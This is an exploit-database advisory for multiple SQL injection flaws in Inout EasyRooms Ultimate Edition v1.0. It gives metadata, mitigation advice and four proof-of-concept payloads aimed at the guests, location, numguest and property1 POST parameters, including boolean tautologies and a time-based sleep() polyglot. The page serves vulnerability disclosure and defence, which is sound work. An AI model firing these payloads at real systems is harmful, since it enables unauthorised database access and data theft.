Inout EasyRooms Ultimate Edition - SQL Injection

vendor:

Inout EasyRooms Ultimate Edition

by:

Ahmet Ümit BAYRAM

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Inout EasyRooms Ultimate Edition

Affected Version From: v1.0

Affected Version To: v1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:inoutscripts:inout_easyrooms_ultimate_edition

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Kali Linux

2019

Inout EasyRooms Ultimate Edition – SQL Injection

Inout EasyRooms Ultimate Edition is prone to multiple SQL injection vulnerabilities. An attacker can exploit these vulnerabilities to gain access to sensitive information stored in the database. The vulnerabilities exist in the 'guests', 'location', 'numguest' and 'property1' parameters of the 'search/rentals', 'search/searchdetailed' scripts respectively. An attacker can send a malicious payload to the vulnerable parameters to execute arbitrary SQL commands in the context of the application's database user.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate SQL commands that can be executed. Parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

# Exploit Title: Inout EasyRooms Ultimate Edition - SQL Injection
# Date: 29.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.inoutscripts.com/products/inout-easyrooms/
# Demo Site: http://inout-easyrooms.demo.inoutscripts.net/
# Version: v1.0
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/search/rentals
Vulnerable Parameter: guests (POST)
Payload: guests=-1' OR 3*2*1=6 AND 00046=00046 --

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: location (POST)
Payload:  location=-1' OR 3*2*1=6 AND 000603=000603 or 'UeNQc30f'='

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: numguest (POST)
Payload:  numguest=-1' OR 3*2*1=6 AND 000232=000232 --


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/search/searchdetailed
Vulnerable Parameter: property1 (POST)
Payload:
property1=(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/